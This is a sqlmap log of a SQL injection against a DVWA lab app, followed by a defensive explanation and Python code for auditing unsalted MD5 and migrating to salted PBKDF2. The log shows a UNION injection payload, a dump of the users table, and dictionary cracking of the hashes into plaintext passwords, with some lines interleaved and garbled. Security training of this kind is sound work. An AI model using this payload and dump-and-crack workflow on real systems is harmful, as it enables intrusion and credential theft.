    Type: UNION query
    Title: MySQL UNION query (NULL) - 2 columns
    Payload: id=1' UNION ALL SELECT CONCAT(0x717a6a7671,0x586b797a44794f5550596575724a4e444d4377616c446b5a7465737a524e68664a6464534d625251,0x71787a7071),NULL#&Submit=Submit
---
[09:38:43] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.4.23, PHP 5.4.45
back-end DBMS: MySQL >= 5.0
[09:38:43] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[09:38:43] [INFO] fetching current database
[09:38:43] [INFO] fetching entries of column(s) '`user`,password' for table 'users' in database 'dvwa'
[09:38:43] [WARNING] reflective value(s) found and filtering out
[09:38:43] [INFO] recognized possible password hashes in column 'password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y
[09:38:46] [INFO] writing hashes to a temporary file 'C:\Users\98377\AppData\Local\Temp\sqlmap01aoz2p_29596\sqlmaphashes-7_sfrh7s.txt'
do you want to crack them via a dictionary-based attack? [Y/n/q] y
[09:38:53] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file 'E:\QQFileRecv\sqlmapproject-sqlmap-1.5.6-2-g7c7c338\sqlmapproject-sqlmap-7c7c338\data\txt\wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 1
[09:39:05] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] y
[09:39:08] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[09:39:08] [INFO] starting 16 processes
[e99a18c428cb38d5f260853678922e0309:39:12' [INFO] cracked password 'abc123' for hash '[' for hash '09:39:148d3533d75ae2c3966d7e0d4fcc69216b] ['[' [09:39:17INFO] [] current status: odrik... /INFO] cracked password 'letmein' for hash '0d107d09f5bbe40cade3de5c71e9e9b7[] [09:39:18INFO] [] cracked password 'INFOpassword] current status: rootp... |' for hash '5f4dcc3b5aa765d61d8327deb882cf99'
[09:39:20] [INFO] using suffix '1'
[09:39:30] [INFO] using suffix '123'
[09:39:3409:39:34] [] [INFOINFO] current status: arym1... /] cracked password 'abc123' for hash 'e99a18c428cb38d5f260853678922e03'
[09:39:40] [INFO] using suffix '2'
[09:39:50] [INFO] using suffix '12'
[09:40:00] [INFO] using suffix '3'
[09:40:10] [INFO] using suffix '13'
[09:40:20] [INFO] using suffix '7'
[09:40:31] [INFO] using suffix '11'
[09:40:41] [INFO] using suffix '5'
[09:40:51] [INFO] using suffix '22'
[09:41:02] [INFO] using suffix '23'
[09:41:12] [INFO] using suffix '01'
[09:41:22] [INFO] using suffix '4'
[09:41:32] [INFO] using suffix '07'
[09:41:42] [INFO] using suffix '21'
[09:41:52] [INFO] using suffix '14'
[09:42:03] [INFO] using suffix '10'
[09:42:12] [INFO] using suffix '06'
[09:42:22] [INFO] using suffix '08'
[09:42:32] [INFO] using suffix '8'
[09:42:43] [INFO] using suffix '15'
[09:42:53] [INFO] using suffix '69'
[09:43:02] [INFO] using suffix '16'
[09:43:13] [INFO] using suffix '6'
[09:43:23] [INFO] using suffix '18'
[09:43:33] [INFO] using suffix '!'
[09:43:43] [INFO] using suffix '.'
[09:43:52] [INFO] using suffix '*'
[09:44:03] [INFO] using suffix '!!'
[09:44:12] [INFO] using suffix '?'
[09:44:22] [INFO] using suffix ';'
[09:44:32] [INFO] using suffix '..'
[09:44:42] [INFO] using suffix '!!!'
[09:45:02] [INFO] using suffix ', '
[09:46:38] [INFO] using suffix '@'
Database: dvwa
Table: users
[5 entries]
+---------+---------------------------------------------+
| user    | password                                    |
+---------+---------------------------------------------+
| admin   | 5f4dcc3b5aa765d61d8327deb882cf99 (password) |
| gordonb | e99a18c428cb38d5f260853678922e03 (abc123)   |
| 1337    | 8d3533d75ae2c3966d7e0d4fcc69216b (charley)  |
| pablo   | 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein)  |
| smithy  | 5f4dcc3b5aa765d61d8327deb882cf99 (password) |
+---------+---------------------------------------------+

[09:46:49] [INFO] table 'dvwa.users' dumped to CSV file 'C:\Users\98377\AppData\Local\sqlmap\output\192.168.232.149\dump\dvwa\users.csv'
[09:46:49] [INFO] fetched data logged to text files under 'C:\Users\98377\AppData\Local\sqlmap\output\192.168.232.149'
[09:46:49] [WARNING] your sqlmap version is outdated

[*] ending @ 09:46:49 /2022-05-26/
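The dump shows why the hashes fell within seconds: the users table stores passwords as bare, unsalted MD5 ('md5_generic_passwd' above), so each wordlist entry has to be hashed only once and compared against every row, and the two accounts that share a password (admin and smithy) visibly share a hash. The following Python is an added example, not part of this lab and not code from sqlmap or DVWA. audit_unsalted_md5 is the check a defender can run over an exported table to flag weak storage, using a small constructed wordlist that contains the values recovered above; hash_password and verify_password show the corrected storage (random per-user salt, PBKDF2-HMAC-SHA256, constant-time comparison), under which the same audit finds nothing and equal passwords no longer yield equal records. The row values are copied from the dump; the wordlist and iteration count are the example's own choices.

```python
import hashlib
import hmac
import secrets

# The rows sqlmap dumped above (DVWA's demo accounts), copied here as the audit input.
DUMPED_USERS = {
    "admin":   "5f4dcc3b5aa765d61d8327deb882cf99",
    "gordonb": "e99a18c428cb38d5f260853678922e03",
    "1337":    "8d3533d75ae2c3966d7e0d4fcc69216b",
    "pablo":   "0d107d09f5bbe40cade3de5c71e9e9b7",
    "smithy":  "5f4dcc3b5aa765d61d8327deb882cf99",
}

# Tiny constructed wordlist standing in for sqlmap's default wordlist.tx_.
WORDLIST = ["123456", "password", "abc123", "letmein", "charley", "qwerty"]

def audit_unsalted_md5(rows, wordlist):
    """Map user -> recovered password for every stored value that is the bare MD5 of a wordlist entry.

    With no salt, each word is hashed once and matched against all rows at once; that
    is the property that let the dictionary run above finish almost immediately.
    """
    lookup = {hashlib.md5(word.encode()).hexdigest(): word for word in wordlist}
    return {user: lookup[stored] for user, stored in rows.items() if stored in lookup}

# Corrected storage: random per-user salt plus PBKDF2-HMAC-SHA256 with a high iteration count
# (600,000 is this example's choice; tune it to the login server's latency budget).
ITERATIONS = 600_000

def hash_password(password, salt=None):
    """Return 'salt$digest' in hex; a fresh 16-byte salt is drawn unless one is supplied."""
    salt = salt if salt is not None else secrets.token_bytes(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return salt.hex() + "$" + digest.hex()

def verify_password(stored, password):
    """Recompute with the stored salt and compare in constant time."""
    salt_hex, digest_hex = stored.split("$", 1)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), ITERATIONS)
    return hmac.compare_digest(digest.hex(), digest_hex)

def migrate(rows, plaintexts):
    """Re-hash the accounts whose plaintext the audit recovered, producing a hardened table."""
    return {user: hash_password(plaintexts[user]) for user in rows if user in plaintexts}

if __name__ == "__main__":
    weak = audit_unsalted_md5(DUMPED_USERS, WORDLIST)
    print("weakly stored:", weak)
    hardened = migrate(DUMPED_USERS, weak)
    print("audit after migration:", audit_unsalted_md5(hardened, WORDLIST))
    print("admin and smithy share a record?", hardened["admin"] == hardened["smithy"])
```

In a real migration the plaintext is not available in bulk; the usual approach is to re-hash each account at its next successful login (or wrap the legacy MD5 inside the new construction until then). The audit function still applies unchanged to the exported column, and a result of {} after migration is the check that the weak format is gone.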